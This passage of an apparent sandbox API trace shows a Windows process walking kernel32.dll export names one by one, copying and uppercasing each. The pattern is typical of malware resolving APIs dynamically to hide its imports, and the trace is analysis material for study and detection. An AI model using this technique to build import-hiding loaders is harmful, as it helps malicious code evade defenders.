(lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0087.290] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0xfa0000 [0087.290] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0087.291] lstrlenA (lpString="kernel32.dll") returned 12 [0087.291] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0087.291] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0087.291] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0087.291] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0087.291] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0087.291] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0087.291] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0087.291] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0087.291] lstrlenA (lpString="ADDATOMA") returned 8 [0087.291] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0087.291] lstrlenA (lpString="ADDATOMW") returned 8 [0087.291] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0087.291] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0087.291] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0087.291] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0087.291] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0087.291] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0087.291] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0087.291] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0087.291] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0087.291] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0087.291] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0087.291] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0087.291] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0087.292] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0087.292] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0087.292] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0087.292] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0087.292] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0087.292] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0087.292] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0087.292] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0087.292] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0087.292] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0087.292] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0087.292] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0087.292] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0087.292] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0087.292] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0087.292] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0087.292] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0087.292] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0087.292] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0087.292] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0087.292] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0087.292] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0087.292] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0087.292] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0087.292] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0087.292] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0087.292] lstrlenA (lpString="BACKUPREAD") returned 10 [0087.292] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0087.292] lstrlenA (lpString="BACKUPSEEK") returned 10 [0087.292] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0087.292] lstrlenA (lpString="BACKUPWRITE") returned 11 [0087.292] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0087.292] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0087.292] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0087.292] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0087.292] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0087.293] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0087.293] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0087.293] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0087.293] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0087.293] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0087.293] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0087.293] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0087.293] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0087.293] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0087.293] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0087.293] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0087.293] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0087.293] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0087.293] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0087.293] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0087.293] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0087.293] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0087.293] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0087.293] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0087.293] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0087.293] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0087.293] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0087.293] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0087.293] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0087.293] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0087.293] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0087.293] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0087.293] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0087.293] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0087.293] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0087.293] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0087.293] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0087.293] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0087.293] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0087.293] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0087.293] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0087.293] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0087.294] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0087.294] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0087.294] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0087.294] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0087.294] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0087.294] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0087.294] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0087.294] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0087.294] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0087.294] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0087.294] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0087.294] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0087.294] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0087.294] lstrlenA (lpString="BEEP") returned 4 [0087.294] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0087.294] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0087.294] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0087.294] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0087.294] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0087.294] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0087.294] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0087.294] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0087.294] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0087.294] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0087.294] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0087.294] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0087.294] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0087.295] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0087.295] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0087.295] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0087.295] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0087.295] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0087.295] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0087.295] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0087.295] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0087.295] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0087.295] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0087.295] lstrlenA (lpString="CANCELIO") returned 8 [0087.295] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0087.295] lstrlenA (lpString="CANCELIOEX") returned 10 [0087.295] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0087.295] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0087.295] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0087.295] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0087.295] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0087.295] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0087.295] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0087.295] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0087.295] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0087.295] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0087.295] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0087.295] lstrlenA (lpString="CHECKELEVATION") returned 14 [0087.295] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0087.295] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0087.295] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0087.295] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0087.295] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0087.295] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0087.295] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0087.295] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0087.295] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0087.295] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0087.295] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0087.295] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0087.295] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0087.296] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0087.296] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0087.296] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0087.296] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0087.296] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0087.296] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0087.296] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0087.296] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0087.296] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0087.296] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0087.296] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0087.296] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0087.296] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0087.296] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0087.296] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0087.296] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0087.296] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0087.296] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0087.296] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0087.296] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0087.296] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0087.296] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0087.296] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0087.296] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0087.296] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0087.296] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0087.296] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0087.296] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0087.296] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0087.296] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0087.296] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0087.296] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0087.296] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0087.296] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0087.296] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0087.296] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0087.296] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0087.297] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0087.297] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0087.297] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0087.297] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0087.297] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0087.297] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0087.297] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0087.297] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0087.297] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0087.297] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0087.297] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0087.297] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0087.297] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0087.297] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0087.297] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0087.297] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0087.297] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0087.297] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0087.297] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0087.297] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0087.297] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0087.297] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0087.297] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0087.297] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0087.297] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0087.297] lstrlenA (lpString="COPYCONTEXT") returned 11 [0087.297] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0087.297] lstrlenA (lpString="COPYFILEA") returned 9 [0087.297] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0087.297] lstrlenA (lpString="COPYFILEEXA") returned 11 [0087.297] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0087.297] lstrlenA (lpString="COPYFILEEXW") returned 11 [0087.297] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0087.297] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0087.297] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0087.297] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0087.297] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0087.297] lstrlenA (lpString="COPYFILEW") returned 9 [0087.298] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0087.298] lstrlenA (lpString="COPYLZFILE") returned 10 [0087.298] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") 